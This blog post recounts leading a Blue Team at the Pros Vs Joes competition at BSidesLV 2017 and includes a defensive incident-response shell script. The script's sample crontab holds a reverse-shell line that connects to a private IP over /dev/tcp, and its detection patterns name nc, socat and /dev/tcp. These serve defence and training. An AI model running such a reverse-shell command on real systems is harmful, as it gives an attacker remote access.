Leading a Blue Team at Pros Vs Joes, BSidesLV 2017

Pros Vs Joes at BSidesLV 2017 was an incredible year in terms of game progression and development. The game ran more smoothly this time than ever before; not only that, but the teams were more effective, and ultimately I think everyone had a pretty good time. The game has been transforming dramatically over time: it's now on the 3rd iteration of scorebot, and we've seen some massive changes to the rules and strategy of the game. The new economy aspect was one of my favorite parts; Dichotomy's Marketplace lets you spend points to get small effects in the game, which gives one the potential for a strategic advantage in various ways. We used this to reset our services at key times, taking a small hit but ultimately securing second place for us in the scoring. In the following post I'm going to highlight some of my pain points, successes, and overall thoughts on leading a Blue Team at PvJ this year.
This was my first time leading a Blue Team at Pros Versus Joes from start to finish. Our team, SOC Team 6, did an absolutely amazing job (despite missing 3 players), and we ended up taking second place after playing a very strong game. We really earned second place this year, with David's team securing first again, and I personally feel very good about our game play, as it was seemingly night and day from last year. I think all team leads struggled with levels of engagement this year; in fact Caz wrote up an excellent piece covering this, which I hope he publishes. Early engagement is important to assess players' skill levels so they can be appropriately placed with mentors and to balance out the subteams. I ended up spending most of my time playing a resources game, making sure we had the appropriate people working on the right tasks. Further, our pain points in dealing with Grey Team as a Blue Team seem to have been greatly reduced this year through balancing the game's scoring (last year these interactions drove us into the negatives and dramatically changed the game). There were still some hardware constraints this year, like when we would peg 100% CPU utilization on the firewall, which caused us to drop packets and fail service checks. All teams were also still limited by the VPN, meaning at times I had 1-2 players sitting on the bench waiting for a VPN connection. Despite these small hiccups, the environment seemingly gets more stable each year. Further, the Red Team had advance access this year, meaning the environment was more fraught with traps than ever, despite mostly being the same configuration of machines and services.
The Red Team got advance access this year, allowing them to exploit and plant post-exploitation measures equally across the environment. I really liked this aspect of the game, as it trends the game more towards incident response and less around initial hardening scripts. Further, the Red Team shared their slides, which were an amazing tell-all of the exploits they used and the pre-planted persistence they would leverage on day one. Not only were these slides whipped up in only a few minutes, but the PvJ Red Team also applies pressure in an expert fashion throughout the game, targeting the teams doing the best the hardest. Day two also introduces Scorched Earth, where we got hit with the same old DNS DoS attack from previous years, but we were able to bounce back quickly from that outage since we knew exactly what it was.
Our success as a Blue Team was both in hardening and incident response. We prepared some nice hardening GPOs and scripts beforehand, which allowed us to lock down our Windows domain and Linux servers early. We were also effective in finding and eliminating shells and persistence mechanisms through a series of IR scripts we had prepared. Our host-based egress filtering was extremely effective; however, Dichotomy reminded us early that this was against the rules, and when we disabled these local firewall rules on all machines we quickly saw many shells escape the network. Again, we used Snort on the pfSense firewall to play a locked-down network game, and also used this network telemetry to hunt infections on the various hosts. Once we identified the hosts, it was usually pretty simple to kill the shells, find persistence mechanisms, and examine the logs to understand how the box was compromised. Unfortunately, we didn't get to centralized host management or a centralized place for log analysis, despite this being in the planning. We also used other hacky tricks, such as scripting the restarting of a service or the disabling of shells on boxes. One of my favorite new aspects of the game, Dichotomy's Marketplace, offers teams a way to change their strategy and affect the scoring of the game at an upfront cost to their score. We used it to revert services and machines as part of our strategy, but in retrospect I wish we had actually purchased more services to catch the leading team. Further, the ability to outsource Grey Team tickets was powerful, since some of the things they asked for could be devastating if compromised (such as Domain Admin access). I also really enjoyed the Party Mode at the end of the game; this wacky feature on top of the Scorched Earth phase made the end of the game particularly exciting.
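To make the "find the shells, kill them, check persistence" loop above concrete, here is an added example of the kind of Linux IR triage script a Blue Team would keep in its kit. It is not SOC Team 6's script (the post does not include those); it is illustrative code written for this page. It assumes the output format of `ss -Htnp state established` (Recv-Q, Send-Q, local, peer, process), crontab syntax, and IPv4 peers; the sample `ss` and cron lines, process names, PIDs, addresses and the per-host allowlist are all constructed for the example.

```shell
#!/bin/sh
# Added example, not the SOC Team 6 scripts. Triage for a Linux host:
# flag established TCP connections owned by processes that should not be
# talking on the network, scan cron entries for reverse-shell indicators,
# and kill the suspects while recording their peers for a network hunt.

# Constructed sample output of `ss -Htnp state established`; the process
# names, PIDs and peer addresses are made up for this example.
SAMPLE_SS='0 0 10.0.5.10:80 10.0.9.4:51234 users:(("nginx",pid=812,fd=9))
0 0 10.0.5.10:22 10.0.1.7:40212 users:(("sshd",pid=1209,fd=4))
0 0 10.0.5.10:39822 172.16.40.3:4444 users:(("bash",pid=2231,fd=3))
0 0 10.0.5.10:51002 172.16.40.3:443 users:(("python3",pid=2300,fd=5))
0 0 10.0.5.10:3306 10.0.5.11:55214 users:(("mysqld",pid=900,fd=21))'

# Constructed sample crontab for the persistence check.
SAMPLE_CRON='# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * bash -i >& /dev/tcp/172.16.40.3/4444 0>&1
@reboot /usr/bin/python3 /tmp/.x.py'

# Per-host allowlist of processes expected to own TCP sockets (assumption:
# this box is a web/db server reachable over ssh). Anything else holding an
# established connection is treated as a suspect shell.
EXPECTED_PROCS='nginx sshd mysqld'

# Default to a dry run; set DRY_RUN=0 to actually kill.
DRY_RUN=${DRY_RUN:-1}

# suspect_conns: read ss lines on stdin, print "PID NAME PEER" for every
# established connection whose owning process is not on the allowlist.
suspect_conns() {
    while read -r _recvq _sendq _local peer proc; do
        name=$(printf '%s' "$proc" | sed -n 's/.*(("\([^"]*\)",pid=\([0-9]*\).*/\1/p')
        pid=$(printf '%s' "$proc" | sed -n 's/.*(("\([^"]*\)",pid=\([0-9]*\).*/\2/p')
        [ -n "$name" ] || continue          # line carries no process info
        case " $EXPECTED_PROCS " in
            *" $name "*) continue ;;        # expected daemon, skip it
        esac
        printf '%s %s %s\n' "$pid" "$name" "$peer"
    done
}

# suspect_cron: read crontab lines on stdin, print the ones containing
# common reverse-shell / dropper indicators. The pattern list is an
# assumption; extend it with whatever the Red Team actually uses.
suspect_cron() {
    grep -E '/dev/tcp/|bash -i|nc |ncat|socat|base64 -d|/tmp/|/dev/shm/'
}

# kill_suspects: take suspect_conns output, kill each PID (unless DRY_RUN=1)
# and append the peer IP to a hunt file so the same C2 address can be
# searched for in the Snort/pfSense telemetry and on the other hosts.
# Assumes IPv4 peers ("a.b.c.d:port").
kill_suspects() {
    huntfile=$1
    while read -r pid name peer; do
        printf '%s\n' "${peer%:*}" >> "$huntfile"
        if [ "$DRY_RUN" = 1 ]; then
            printf 'would kill %s (%s -> %s)\n' "$pid" "$name" "$peer"
        else
            kill -9 "$pid" 2>/dev/null || printf 'kill failed for %s\n' "$pid"
        fi
    done
}

# Stand-alone run against the constructed samples. On a live box replace the
# first printf with:  ss -Htnp state established | suspect_conns
hunt=$(mktemp)
printf '%s\n' "$SAMPLE_SS" | suspect_conns | kill_suspects "$hunt"
printf 'peers to hunt for: %s\n' "$(sort -u "$hunt" | tr '\n' ' ')"
printf '%s\n' "$SAMPLE_CRON" | suspect_cron
```

On the sample input the two connections owned by `bash` and `python3` are reported and the two cron lines with a `/dev/tcp/` shell and a `/tmp/` dropper are flagged, while nginx, sshd, mysqld and the backup job are left alone. The allowlist is the part that has to be tuned per box: a too-short list makes every run noisy, a too-long one lets an interpreter that was planted as a "service" slip through.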
All of that said, this game is an absolutely amazing learning opportunity. Rarely does one get the opportunity to simulate a breach or IR scenario so realistically, much like CCDC. I really encourage people to try this game, whether you're Blue Team or Red Team, and whether or not you've been in a live breach scenario before; this is an invaluable experience. This game is also great for those who coach or help with CCDC or other Attack/Defense competitions and want an opportunity to experience the game in a more hands-on way. Returning players should consider signing up as a Pro, either Blue or Red, as we always need and welcome more returning people in our PvJ community!